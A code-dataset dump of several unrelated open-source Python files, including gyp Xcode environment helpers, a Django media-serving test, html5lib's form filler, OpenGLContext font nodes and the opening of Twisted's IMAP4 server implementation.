http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/1-Build_Setting_Reference/build_setting_ref.html#//apple_ref/doc/uid/TP40003931-CH3-SW153
for a full list.
Args:
xcode_settings: An XcodeSettings object. If this is None, this function
returns an empty dict.
built_products_dir: Absolute path to the built products dir.
srcroot: Absolute path to the source root.
configuration: The build configuration name.
additional_settings: An optional dict with more values to add to the
result.
"""
if not xcode_settings: return {}
# This function is considered a friend of XcodeSettings, so let it reach into
# its implementation details.
spec = xcode_settings.spec
# These are filled in on a as-needed basis.
env = {
'BUILT_PRODUCTS_DIR' : built_products_dir,
'CONFIGURATION' : configuration,
'PRODUCT_NAME' : xcode_settings.GetProductName(),
# See /Developer/Platforms/MacOSX.platform/Developer/Library/Xcode/Specifications/MacOSX\ Product\ Types.xcspec for FULL_PRODUCT_NAME
'SRCROOT' : srcroot,
'SOURCE_ROOT': '${SRCROOT}',
# This is not true for static libraries, but currently the env is only
# written for bundles:
'TARGET_BUILD_DIR' : built_products_dir,
'TEMP_DIR' : '${TMPDIR}',
}
if xcode_settings.GetPerConfigSetting('SDKROOT', configuration):
env['SDKROOT'] = xcode_settings._SdkPath(configuration)
else:
env['SDKROOT'] = ''
if spec['type'] in (
'executable', 'static_library', 'shared_library', 'loadable_module'):
env['EXECUTABLE_NAME'] = xcode_settings.GetExecutableName()
env['EXECUTABLE_PATH'] = xcode_settings.GetExecutablePath()
env['FULL_PRODUCT_NAME'] = xcode_settings.GetFullProductName()
mach_o_type = xcode_settings.GetMachOType()
if mach_o_type:
env['MACH_O_TYPE'] = mach_o_type
env['PRODUCT_TYPE'] = xcode_settings.GetProductType()
if xcode_settings._IsBundle():
env['CONTENTS_FOLDER_PATH'] = \
xcode_settings.GetBundleContentsFolderPath()
env['UNLOCALIZED_RESOURCES_FOLDER_PATH'] = \
xcode_settings.GetBundleResourceFolder()
env['INFOPLIST_PATH'] = xcode_settings.GetBundlePlistPath()
env['WRAPPER_NAME'] = xcode_settings.GetWrapperName()
install_name = xcode_settings.GetInstallName()
if install_name:
env['LD_DYLIB_INSTALL_NAME'] = install_name
install_name_base = xcode_settings.GetInstallNameBase()
if install_name_base:
env['DYLIB_INSTALL_NAME_BASE'] = install_name_base
if not additional_settings:
additional_settings = {}
else:
# Flatten lists to strings.
for k in additional_settings:
if not isinstance(additional_settings[k], str):
additional_settings[k] = ' '.join(additional_settings[k])
additional_settings.update(env)
for k in additional_settings:
additional_settings[k] = _NormalizeEnvVarReferences(additional_settings[k])
return additional_settings
def _NormalizeEnvVarReferences(str):
"""Takes a string containing variable references in the form ${FOO}, $(FOO),
or $FOO, and returns a string with all variable references in the form ${FOO}.
"""
# $FOO -> ${FOO}
str = re.sub(r'\$([a-zA-Z_][a-zA-Z0-9_]*)', r'${\1}', str)
# $(FOO) -> ${FOO}
matches = re.findall(r'(\$\(([a-zA-Z0-9\-_]+)\))', str)
for match in matches:
to_replace, variable = match
assert '$(' not in match, '$($(FOO)) variables not supported: ' + match
str = str.replace(to_replace, '${' + variable + '}')
return str
def ExpandEnvVars(string, expansions):
"""Expands ${VARIABLES}, $(VARIABLES), and $VARIABLES in string per the
expansions list. If the variable expands to something that references
another variable, this variable is expanded as well if it's in env --
until no variables present in env are left."""
for k, v in reversed(expansions):
string = string.replace('${' + k + '}', v)
string = string.replace('$(' + k + ')', v)
string = string.replace('$' + k, v)
return string
def _TopologicallySortedEnvVarKeys(env):
"""Takes a dict |env| whose values are strings that can refer to other keys,
for example env['foo'] = '$(bar) and $(baz)'. Returns a list L of all keys of
env such that key2 is after key1 in L if env[key2] refers to env[key1].
Throws an Exception in case of dependency cycles.
"""
# Since environment variables can refer to other variables, the evaluation
# order is important. Below is the logic to compute the dependency graph
# and sort it.
regex = re.compile(r'\$\{([a-zA-Z0-9\-_]+)\}')
def GetEdges(node):
# Use a definition of edges such that user_of_variable -> used_varible.
# This happens to be easier in this case, since a variable's
# definition contains all variables it references in a single string.
# We can then reverse the result of the topological sort at the end.
# Since: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
matches = set([v for v in regex.findall(env[node]) if v in env])
for dependee in matches:
assert '${' not in dependee, 'Nested variables not supported: ' + dependee
return matches
try:
# Topologically sort, and then reverse, because we used an edge definition
# that's inverted from the expected result of this function (see comment
# above).
order = gyp.common.TopologicallySorted(env.keys(), GetEdges)
order.reverse()
return order
except gyp.common.CycleError, e:
raise GypError(
'Xcode environment variables are cyclically dependent: ' + str(e.nodes))
def GetSortedXcodeEnv(xcode_settings, built_products_dir, srcroot,
configuration, additional_settings=None):
env = _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration,
additional_settings)
return [(key, env[key]) for key in _TopologicallySortedEnvVarKeys(env)]
def GetSpecPostbuildCommands(spec, quiet=False):
"""Returns the list of postbuilds explicitly defined on |spec|, in a form
executable by a shell."""
postbuilds = []
for postbuild in spec.get('postbuilds', []):
if not quiet:
postbuilds.append('echo POSTBUILD\\(%s\\) %s' % (
spec['target_name'], postbuild['postbuild_name']))
postbuilds.append(gyp.common.EncodePOSIXShellList(postbuild['action']))
return postbuilds
def _HasIOSTarget(targets):
"""Returns true if any target contains the iOS specific key
IPHONEOS_DEPLOYMENT_TARGET."""
for target_dict in targets.values():
for config in target_dict['configurations'].values():
if config.get('xcode_settings', {}).get('IPHONEOS_DEPLOYMENT_TARGET'):
return True
return False
def _AddIOSDeviceConfigurations(targets):
"""Clone all targets and append -iphoneos to the name. Configure these targets
to build for iOS devices."""
for target_dict in targets.values():
for config_name in target_dict['configurations'].keys():
config = target_dict['configurations'][config_name]
new_config_name = config_name + '-iphoneos'
new_config_dict = copy.deepcopy(config)
if target_dict['toolset'] == 'target':
new_config_dict['xcode_settings']['ARCHS'] = ['armv7']
new_config_dict['xcode_settings']['SDKROOT'] = 'iphoneos'
target_dict['configurations'][new_config_name] = new_config_dict
return targets
def CloneConfigurationForDeviceAndEmulator(target_dicts):
"""If |target_dicts| contains any iOS targets, automatically create -iphoneos
targets for iOS device builds."""
if _HasIOSTarget(target_dicts):
return _AddIOSDeviceConfigurations(target_dicts)
return target_dicts
| mit |
FIWARE-TMForum/business-ecosystem-charging-backend | src/wstore/tests.py | 1 | 10861 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 - 2017 CoNWeT Lab., Universidad Politécnica de Madrid
# This file belongs to the business-charging-backend
# of the Business API Ecosystem.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import json
from mock import call
from wstore.store_commons.tests import *
from wstore.admin.users.tests import *
from django.test.client import RequestFactory
from wstore import views
class ServeMediaTestCase(TestCase):
tags = ('media', )
_resource_path = 'media/assets/test_user/widget.wgt'
_expected_file = 'assets/test_user/widget.wgt'
def setUp(self):
# Mock user
self._user = MagicMock()
self._user.is_anonymous.return_value = False
self._org = MagicMock()
self._user.userprofile.current_organization = self._org
views.Organization = MagicMock()
views.Organization.objects.get.return_value = self._org
# Mock Resource model
views.Resource = MagicMock()
self._asset_inst = MagicMock()
self._asset_inst.is_public = False
self._asset_inst.provider = self._org
views.Resource.objects.filter.return_value = [self._asset_inst]
# Mock serve and smart_str
views.serve = MagicMock()
views.smart_str = MagicMock()
views.smart_str.return_value = 'smart string'
# Mock is_file
views.os.path.isfile = MagicMock()
# Mock Order
views.Order = MagicMock()
order_inst = MagicMock()
order_inst.owner_organization = self._org
views.Order.objects.get.return_value = order_inst
# Mock offering
views.Offering = MagicMock()
self._offering_inst = MagicMock()
self._offering_inst.asset = self._asset_inst
views.Offering.objects.get.side_effect = [MagicMock(), self._offering_inst]
def _validate_res_call(self):
views.Resource.objects.filter.assert_called_once_with(resource_path=self._resource_path)
self.assertEquals(0, views.Order.objects.get.call_count)
def _validate_off_call(self):
self._validate_res_call()
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2')
], views.Offering.objects.get.call_args_list)
def _validate_bundle_call(self):
self._validate_res_call()
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2'),
call(pk='offpk3'),
call(pk='offpk3'),
call(pk='offpk4'),
call(pk='offpk4')
], views.Offering.objects.get.call_args_list)
def _validate_product_bundle_call(self):
views.Resource.objects.filter.assert_called_once_with(resource_path=self._resource_path)
self.assertEquals([
call(pk='prodpk1'),
call(pk='prodpk2')
], views.Resource.objects.get.call_args_list)
self.assertEquals(0, views.Order.objects.get.call_count)
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2')
], views.Offering.objects.get.call_args_list)
def _validate_upgrading_call(self):
self.assertEquals([
call(resource_path=self._resource_path),
call(state='upgrading', provider=self._org)
], views.Resource.objects.filter.call_args_list)
views.Organization.objects.get.assert_called_once_with(name='test_user')
def _validate_order_call(self):
views.Order.objects.get.assert_called_once_with(pk='111111111111111111111111')
self.assertEquals(0, views.Resource.objects.get.call_count)
def _validate_empty_call(self):
self.assertEquals(0, views.Resource.objects.get.call_count)
self.assertEquals(0, views.Order.objects.get.call_count)
def _validate_error(self, response, expected):
resp = json.loads(response.content)
self.assertEquals(expected[0], response.status_code)
self.assertEquals(expected[1], resp)
def _validate_serve(self, response, expected):
views.os.path.isfile(expected)
views.serve.assert_called_once_with(self.request, expected, document_root='/home/test/media/')
def _validate_xfile(self, response, expected):
views.os.path.isfile(expected)
views.smart_str.assert_called_once_with(expected)
self.assertEquals('smart string', response['X-Sendfile'])
def _public_asset(self):
self._asset_inst.is_public = True
self._asset_inst.provider = MagicMock()
def _usexfiles(self):
views.settings = MagicMock()
views.settings.USE_XSENDFILE = True
views.settings.MEDIA_ROOT = '/home/test/media/'
views.settings.MEDIA_URL = '/media/'
views.settings.MEDIA_DIR = 'media/'
def _asset_error(self):
views.Resource.objects.filter.return_value = []
def _order_error(self):
views.Order.objects.get.side_effect = Exception('Not found')
def _unauthorized(self):
self._acquired()
views.Offering.objects.get.side_effect = [MagicMock(is_digital=False),
MagicMock(is_digital=True, asset=MagicMock())]
def _not_loged(self):
self._user.is_anonymous.return_value = True
def _not_found(self):
views.os.path.isfile.return_value = False
def _acquired(self):
self._user.userprofile.current_organization = MagicMock()
self._user.userprofile.current_organization.acquired_offerings = ['offpk1', 'offpk2']
def _bundle_acquired(self):
self._acquired()
self._offering_inst = MagicMock(asset=None, bundled_offerings=['offpk3', 'offpk4'])
views.Offering.objects.get.side_effect = [MagicMock(), self._offering_inst,
MagicMock(is_digital=True, asset=MagicMock()),
MagicMock(is_digital=True, asset=MagicMock()),
MagicMock(is_digital=True, asset=self._asset_inst),
MagicMock(is_digital=True, asset=self._asset_inst)]
def _product_bundle_acquired(self):
self._acquired()
self._offering_inst.asset = MagicMock(bundled_assets=['prodpk1', 'prodpk2'])
views.Resource.objects.get.side_effect = [self._asset_inst, MagicMock(), self._asset_inst]
def _upgrading(self):
self._asset_inst.old_versions = [MagicMock(resource_path=self._resource_path)]
views.Resource.objects.filter.side_effect = [[], [MagicMock(old_versions=[]), self._asset_inst]]
@parameterized.expand([
('asset', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_serve, _expected_file),
('asset_acquired', 'assets/test_user', 'widget.wgt', _validate_off_call, _validate_serve, _expected_file, _acquired),
('asset_in_bundle', 'assets/test_user', 'widget.wgt', _validate_bundle_call, _validate_serve, _expected_file, _bundle_acquired),
('asset_in_product_bundle', 'assets/test_user', 'widget.wgt', _validate_product_bundle_call, _validate_serve, _expected_file, _product_bundle_acquired),
('public_asset', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_serve, _expected_file, _public_asset),
('upgrading_asset', 'assets/test_user', 'widget.wgt', _validate_upgrading_call, _validate_serve, _expected_file, _upgrading),
('invoice', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_xfile, 'bills/111111111111111111111111_userbill.pdf', _usexfiles),
('asset_not_found', 'assets/test_user', 'widget.wgt', _validate_upgrading_call, _validate_error, (404, {
'result': 'error',
'error': 'The specified asset does not exists'
}), _asset_error),
('asset_anonymous', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (401, {
'result': 'error',
'error': 'You must be authenticated to download the specified asset'
}), _not_loged),
('asset_unauthorized', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (403, {
'result': 'error',
'error': 'You are not authorized to download the specified asset'
}), _unauthorized),
('invoice_not_found', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_error, (404, {
'result': 'error',
'error': 'The specified invoice does not exists'
}), _order_error),
('invoice_anonymous', 'bills', '111111111111111111111111_userbill.pdf', _validate_empty_call, _validate_error, (401, {
'result': 'error',
'error': 'You must provide credentials for downloading invoices'
}), _not_loged),
('invoice_unauthorized', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_error, (403, {
'result': 'error',
'error': 'You are not authorized to download the specified invoice'
}), _unauthorized),
('file_not_found', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (404, {
'result': 'error',
'error': 'Resource not found'
}), _not_found),
('invalid_type', 'invalid/user', 'widget.wgt', _validate_empty_call, _validate_error, (404, {
'result': 'error',
'error': 'Resource not found'
}))
])
@override_settings(MEDIA_ROOT='/home/test/media/', MEDIA_URL='/media/', MEDIA_DIR='media/')
def test_serve_media(self, name, path, file_name, call_validator, res_validator, expected, side_effect=None):
if side_effect is not None:
side_effect(self)
factory = RequestFactory()
self.request = factory.post(
'media/' + path + '/' + file_name,
HTTP_ACCEPT='application/json'
)
self.request.user = self._user
media_view = views.ServeMedia(permitted_methods=('GET',))
response = media_view.read(self.request, path, file_name)
call_validator(self)
res_validator(self, response, expected)
| agpl-3.0 |
twamarc/schemaorg | lib/html5lib/filters/formfiller.py | 135 | 5839 | #
# The goal is to finally have a form filler where you pass data for
# each form, using the algorithm for "Seeding a form with initial values"
# See http://www.whatwg.org/specs/web-forms/current-work/#seeding
#
import _base
from html5lib.constants import spaceCharacters
spaceCharacters = u"".join(spaceCharacters)
class SimpleFilter(_base.Filter):
def __init__(self, source, fieldStorage):
_base.Filter.__init__(self, source)
self.fieldStorage = fieldStorage
def __iter__(self):
field_indices = {}
state = None
field_name = None
for token in _base.Filter.__iter__(self):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
name = token["name"].lower()
if name == "input":
field_name = None
field_type = None
input_value_index = -1
input_checked_index = -1
for i,(n,v) in enumerate(token["data"]):
n = n.lower()
if n == u"name":
field_name = v.strip(spaceCharacters)
elif n == u"type":
field_type = v.strip(spaceCharacters)
elif n == u"checked":
input_checked_index = i
elif n == u"value":
input_value_index = i
value_list = self.fieldStorage.getlist(field_name)
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
if field_type in (u"checkbox", u"radio"):
if value_list:
if token["data"][input_value_index][1] == value:
if input_checked_index < 0:
token["data"].append((u"checked", u""))
field_indices[field_name] = field_index + 1
elif input_checked_index >= 0:
del token["data"][input_checked_index]
elif field_type not in (u"button", u"submit", u"reset"):
if input_value_index >= 0:
token["data"][input_value_index] = (u"value", value)
else:
token["data"].append((u"value", value))
field_indices[field_name] = field_index + 1
field_type = None
field_name = None
elif name == "textarea":
field_type = "textarea"
field_name = dict((token["data"])[::-1])["name"]
elif name == "select":
field_type = "select"
attributes = dict(token["data"][::-1])
field_name = attributes.get("name")
is_select_multiple = "multiple" in attributes
is_selected_option_found = False
elif field_type == "select" and field_name and name == "option":
option_selected_index = -1
option_value = None
for i,(n,v) in enumerate(token["data"]):
n = n.lower()
if n == "selected":
option_selected_index = i
elif n == "value":
option_value = v.strip(spaceCharacters)
if option_value is None:
raise NotImplementedError("<option>s without a value= attribute")
else:
value_list = self.fieldStorage.getlist(field_name)
if value_list:
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
if (is_select_multiple or not is_selected_option_found) and option_value == value:
if option_selected_index < 0:
token["data"].append((u"selected", u""))
field_indices[field_name] = field_index + 1
is_selected_option_found = True
elif option_selected_index >= 0:
del token["data"][option_selected_index]
elif field_type is not None and field_name and type == "EndTag":
name = token["name"].lower()
if name == field_type:
if name == "textarea":
value_list = self.fieldStorage.getlist(field_name)
if value_list:
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
yield {"type": "Characters", "data": value}
field_indices[field_name] = field_index + 1
field_name = None
elif name == "option" and field_type == "select":
pass # TODO: part of "option without value= attribute" processing
elif field_type == "textarea":
continue # ignore token
yield token
| apache-2.0 |
stack-of-tasks/rbdlpy | tutorial/lib/python2.7/site-packages/OpenGLContext/scenegraph/text/fontstyle3d.py | 2 | 2726 | """FontStyle extensions for OpenGLContext"""
from vrml.vrml97 import basenodes
from vrml import field, node
class FontStyle( basenodes.FontStyle ):
"""FontStyle with ability to specify geometry format"""
PROTO = 'FontStyle'
## #Fields
## style = field.newField( 'style', 'SFString', 0, 'PLAIN')
## topToBottom = field.newField( 'topToBottom', 'SFBool', 0, 1)
## family = field.newField( 'family', 'MFString', 0, 'SERIF')
## language = field.newField( 'language', 'SFString', 0, '')
## horizontal = field.newField( 'horizontal', 'SFBool', 0, 1)
## justify = field.newField( 'justify', 'MFString', 0, ['BEGIN'])
## spacing = field.newField( 'spacing', 'SFFloat', 0, 1.0)
## leftToRight = field.newField( 'leftToRight', 'SFBool', 0, 1)
## size = field.newField( 'size', 'SFFloat', 0, 1.0)
format = field.newField( 'format', 'SFString', 1, "solid")
class FontStyle3D( FontStyle ):
"""FontStyle with ability to specify 3D extrusion properties"""
PROTO = 'FontStyle3D'
quality = field.newField( 'quality', 'SFInt32', 1, 3)
renderFront = field.newField( 'renderFront', 'SFBool', 1, 1)
renderSides = field.newField( 'renderSides', 'SFBool', 1, 0)
renderBack = field.newField( 'renderBack', 'SFBool', 1, 0)
thickness = field.newField( 'thickness', 'SFFloat', 1, 0.0)
class Glyph( node.Node ):
"""Storage for a glyph's data"""
PROTO = "Glyph"
class Glyph3D( Glyph ):
"""Storage for a 3D glyph's data"""
PROTO = "Glyph3D"
character = field.newField( 'character', 'SFString', 1, "")
width = field.newField( 'width', 'SFFloat', 1, 0.0)
height = field.newField( 'height', 'SFFloat', 1, 0.0)
contours = field.newField( 'contours', 'MFVec2f', 1, list)
outlines = field.newField( 'outlines', 'MFVec2f', 1, list)
class SolidGlyph3D( Glyph3D ):
"""Storage for a solid 3D glyph's data"""
extrusionData = field.newField( 'extrusionData', 'MFNode', 1, list)
tessellationData = field.newField( 'tessellationData', 'MFNode', 1, list)
class SG3D_ExtrData( node.Node ):
"""Storage for contour's extrusion-data for a SolidGlyph3D"""
PROTO = "SG3D_ExtrData"
points = field.newField( 'points', 'MFVec2f', 1, list)
normals = field.newField( 'normals', 'MFVec2f', 1, list)
class SG3D_TessData( node.Node ):
"""Storage for face-tessellation-data for a SolidGlyph3D"""
PROTO = "SG3D_TessData"
geometryType = field.newField( 'geometryType', 'SFString', 1, "GL_TRIANGLES")
vertices = field.newField( 'vertices', 'MFVec2f', 1, list)
class Font( node.Node ):
"""Storage for a precompiled Font"""
PROTO = "Font"
glyphs = field.newField( 'glyphs', 'MFNode', 1, list)
style = field.newField( 'style', 'SFNode', 1, None)
| lgpl-3.0 |
Immortalin/python-for-android | python-modules/twisted/twisted/mail/imap4.py | 49 | 200466 | # -*- test-case-name: twisted.mail.test.test_imap -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An IMAP4 protocol implementation
@author: Jp Calderone
To do::
Suspend idle timeout while server is processing
Use an async message parser instead of buffering in memory
Figure out a way to not queue multi-message client requests (Flow? A simple callback?)
Clarify some API docs (Query, etc)
Make APPEND recognize (again) non-existent mailboxes before accepting the literal
"""
import rfc822
import base64
import binascii
import hmac
import re
import copy
import tempfile
import string
import time
import random
import types
import email.Utils
try:
import cStringIO as StringIO
except:
import StringIO
from zope.interface import implements, Interface
from twisted.protocols import basic
from twisted.protocols import policies
from twisted.internet import defer
from twisted.internet import error
from twisted.internet.defer import maybeDeferred
from twisted.python import log, text
from twisted.internet import interfaces
from twisted import cred
import twisted.cred.error
import twisted.cred.credentials
class MessageSet(object):
"""
Essentially an infinite bitfield, with some extra features.
@type getnext: Function taking C{int} returning C{int}
@ivar getnext: A function that returns the next message number,
used when iterating through the MessageSet. By default, a function
returning the next integer is supplied, but as this can be rather
inefficient for sparse UID iterations, it is recommended to supply
one when messages are requested by UID. The argument is provided
as a hint to the implementation and may be ignored if it makes sense
to do so (eg, if an iterator is being used that maintains its own
state, it is guaranteed that it will not be called out-of-order).
"""
_empty = []
def __init__(self, start=_empty, end=_empty):
"""
Create a new MessageSet()
@type start: Optional C{int}
@param start: Start of range, or only message number
@type end: Optional C{int}
@param end: End of range.
"""
self._last = self._empty # Last message/UID in use
self.ranges = [] # List of ranges included
self.getnext = lambda x: x+1 # A function which will return the next
# message id. Handy for UID requests.
if start is self._empty:
return
if isinstance(start, types.ListType):
self.ranges = start[:]
self.clean()
else:
self.add(start,end)
# Ooo. A property.
def last():
def _setLast(self, value):
if self._last is not self._empty:
raise ValueError("last already set")
self._last = value
for i, (l, h) in enumerate(self.ranges):
if l is not None:
break # There are no more Nones after this
l = value
if h is None:
h = value
if l > h:
l, h = h, l
self.ranges[i] = (l, h)
self.clean()
def _getLast(self):
return self._last
doc = '''
"Highest" message number, refered to by "*".
Must be set before attempting to use the MessageSet.
'''
return _getLast, _setLast, None, doc
last = property(*last())
def add(self, start, end=_empty):
"""
Add another range
@type start: C{int}
@param start: Start of range, or only message number
@type end: Optional C{int}
@param end: End of range.
"""
if end is self._empty:
end = start
if self._last is not self._empty:
if start is None:
start = self.last
if end is None:
end = self.last
if start > end:
# Try to keep in low, high order if possible
# (But we don't know what None means, this will keep
# None at the start of the ranges list)
start, end = end, start
self.ranges.append((start, end))
self.clean()
def __add__(self, other):
if isinstance(other, MessageSet):
ranges = self.ranges + other.ranges
return MessageSet(ranges)
else:
res = MessageSet(self.ranges)
try:
res.add(*other)
except TypeError:
res.add(other)
return res
def extend(self, other):
if isinstance(other, MessageSet):
self.ranges.extend(other.ranges)
self.clean()
else:
try:
self.add(*other)
except TypeError:
self.add(other)
return self
def clean(self):
"""
Clean ranges list, combining adjacent ranges
"""
self.ranges.sort()
oldl, oldh = None, None
for i,(l, h) in enumerate(self.ranges):
if l is None:
continue
# l is >= oldl and h is >= oldh due to sort()
if oldl is not None and l <= oldh + 1:
l = oldl
h = max(oldh, h)
self.ranges[i - 1] = None
self.ranges[i] = (l, h)
oldl, oldh = l, h
self.ranges = filter(None, self.ranges)
def __contains__(self, value):
"""
May raise TypeError if we encounter an open-ended range
"""
for l, h in self.ranges:
if l is None:
raise TypeError(
"Can't determine membership; last value not set")
if l <= value <= h:
return True
return False
def _iterator(self):
for l, h in self.ranges:
l = self.getnext(l-1)
while l <= h:
yield l
l = self.getnext(l)
if l is None:
break
def __iter__(self):
if self.ranges and self.ranges[0][0] is None:
raise TypeError("Can't iterate; last value not set")
return self._iterator()
def __len__(self):
res = 0
for l, h in self.ranges:
if l is None:
if h is None:
res += 1
else:
raise TypeError("Can't size object; last value not set")
else:
res += (h - l) + 1
return res
def __str__(self):
p = []
for low, high in self.ranges:
if low == high:
if low is None:
p.append('*')
else:
p.append(str(low))
elif low is None:
p.append('%d:*' % (high,))
else:
p.append('%d:%d' % (low, high))
return ','.join(p)
def __repr__(self):
return '<MessageSet %s>' % (str(self),)
def __eq__(self, other):
if isinstance(other, MessageSet):
return self.ranges == other.ranges
return False
class LiteralString:
def __init__(self, size, defered):
self.size = size
self.data = []
self.defer = defered
def write(self, data):
self.size -= len(data)
passon = None
if self.size > 0:
self.data.append(data)
else:
if self.size:
data, passon = data[:self.size], data[self.size:]
else:
passon = ''
if data:
self.data.append(data)
return passon
def callback(self, line):
"""
Call defered with data and rest of line
"""
self.defer.callback((''.join(self.data), line))
class LiteralFile:
_memoryFileLimit = 1024 * 1024 * 10
def __init__(self, size, defered):
self.size = size
self.defer = defered
if size > self._memoryFileLimit:
self.data = tempfile.TemporaryFile()
else:
self.data = StringIO.StringIO()
def write(self, data):
self.size -= len(data)
passon = None
if self.size > 0:
self.data.write(data)
else:
if self.size:
data, passon = data[:self.size], data[self.size:]
else:
passon = ''
if data:
self.data.write(data)
return passon
def callback(self, line):
"""
Call defered with data and rest of line
"""
self.data.seek(0,0)
self.defer.callback((self.data, line))
class WriteBuffer:
"""Buffer up a bunch of writes before sending them all to a transport at once.
"""
def __init__(self, transport, size=8192):
self.bufferSize = size
self.transport = transport
self._length = 0
self._writes = []
def write(self, s):
self._length += len(s)
self._writes.append(s)
if self._length > self.bufferSize:
self.flush()
def flush(self):
if self._writes:
self.transport.writeSequence(self._writes)
self._writes = []
self._length = 0
class Command:
_1_RESPONSES = ('CAPABILITY', 'FLAGS', 'LIST', 'LSUB', 'STATUS', 'SEARCH', 'NAMESPACE')
_2_RESPONSES = ('EXISTS', 'EXPUNGE', 'FETCH', 'RECENT')
_OK_RESPONSES = ('UIDVALIDITY', 'UNSEEN', 'READ-WRITE', 'READ-ONLY', 'UIDNEXT', 'PERMANENTFLAGS')
defer = None
def __init__(self, command, args=None, wantResponse=(),
continuation=None, *contArgs, **contKw):
self.command = command
self.args = args
self.wantResponse = wantResponse
self.continuation = lambda x: continuation(x, *contArgs, **contKw)
self.lines = []
def format(self, tag):
if self.args is None:
return ' '.join((tag, self.command))
return ' '.join((tag, self.command, self.args))
def finish(self, lastLine, unusedCallback):
send = []
unuse = []
for L in self.lines:
names = parseNestedParens(L)
N = len(names)
if (N >= 1 and names[0] in self._1_RESPONSES or
N >= 2 and names[1] in self._2_RESPONSES or
N >= 2 and names[0] == 'OK' and isinstance(names[1], types.ListType) and names[1][0] in self._OK_RESPONSES):
send.append(names)
else:
unuse.append(names)
d, self.defer = self.defer, None
d.callback((send, lastLine))
if unuse:
unusedCallback(unuse)
class LOGINCredentials(cred.credentials.UsernamePassword):
def __init__(self):
self.challenges = ['Password\0', 'User Name\0']
self.responses = ['password', 'username']
cred.credentials.UsernamePassword.__init__(self, None, None)
def getChallenge(self):
return self.challenges.pop()
def setResponse(self, response):
setattr(self, self.responses.pop(), response)
def moreChallenges(self):
return bool(self.challenges)
class PLAINCredentials(cred.credentials.UsernamePassword):
def __init__(self):
cred.credentials.UsernamePassword.__init__(self, None, None)
def getChallenge(self):
return ''
def setResponse(self, response):
parts = response.split('\0')
if len(parts) != 3:
raise IllegalClientResponse("Malformed Response - wrong number of parts")
useless, self.username, self.password = parts
def moreChallenges(self):
return False
class IMAP4Exception(Exception):
def __init__(self, *args):
Exception.__init__(self, *args)
class IllegalClientResponse(IMAP4Exception): pass
class IllegalOperation(IMAP4Exception): pass
class IllegalMailboxEncoding(IMAP4Exception): pass
class IMailboxListener(Interface):
"""Interface for objects interested in mailbox events"""
def modeChanged(writeable):
"""Indicates that the write status of a mailbox has changed.
@type writeable: C{bool}
@param writeable: A true value if write is now allowed, false
otherwise.
"""
def flagsChanged(newFlags):
"""Indicates that the flags of one or more messages have changed.
@type newFlags: C{dict}
@param newFlags: A mapping of message identifiers to tuples of flags
now set on that message.
"""
def newMessages(exists, recent):
"""Indicates that the number of messages in a mailbox has changed.
@type exists: C{int} or C{None}
@param exists: The total number of messages now in this mailbox.
If the total number of messages has not changed, this should be
C{None}.
@type recent: C{int}
@param recent: The number of messages now flagged \\Recent.
If the number of recent messages has not changed, this should be
C{None}.
"""
class IMAP4Server(basic.LineReceiver, policies.TimeoutMixin):
"""
Protocol implementation for an IMAP4rev1 server.
The server can be in any of four states:
- Non-authenticated
- Authenticated
- Selected
- Logout
"""
implements(IMailboxListener)
# Identifier for this server software
IDENT = 'Twisted IMAP4rev1 Ready'
# Number of seconds before idle timeout
# Initially 1 minute. Raised to 30 minutes after login.
timeOut = 60
POSTAUTH_TIMEOUT = 60 * 30
# Whether STARTTLS has been issued successfully yet or not.
startedTLS = False
# Whether our transport supports TLS
canStartTLS = False
# Mapping of tags to commands we have received
tags = None
# The object which will handle logins for us
portal = None
# The account object for this connection
account = None
# Logout callback
_onLogout = None
# The currently selected mailbox
mbox = None
# Command data to be processed when literal data is received
_pendingLiteral = None
# Maximum length to accept for a "short" string literal
_literalStringLimit = 4096
# IChallengeResponse factories for AUTHENTICATE command
challengers = None
# Search terms the implementation of which needs to be passed both the last
# message identifier (UID) and the last sequence id.
_requiresLastMessageInfo = set(["OR", "NOT", "UID"])
state = 'unauth'
parseState = 'command'
def __init__(self, chal = None, contextFactory = None, scheduler = None):
if chal is None:
chal = {}
self.challengers = chal
self.ctx = contextFactory
if scheduler is None:
scheduler = iterateInReactor
self._scheduler = scheduler
self._queuedAsync = []
def capabilities(self):
cap = {'AUTH': self.challengers.keys()}
if self.ctx and self.canStartTLS:
if not self.startedTLS and interfaces.ISSLTransport(self.transport, None) is None:
cap['LOGINDISABLED'] = None
cap['STARTTLS'] = None
cap['NAMESPACE'] = None
cap['IDLE'] = None
return cap
def connectionMade(self):
self.tags = {}
self.canStartTLS = interfaces.ITLSTransport(self.transport, None) is not None
self.setTimeout(self.timeOut)
self.sendServerGreeting()
def connectionLost(self, reason):
self.setTimeout(None)
if self._onLogout:
self._onLogout()
self._onLogout = None
def timeoutConnection(self):
self.sendLine('* BYE Autologout; connection idle too long')
self.transport.loseConnection()
if self.mbox:
self.mbox.removeListener(self)
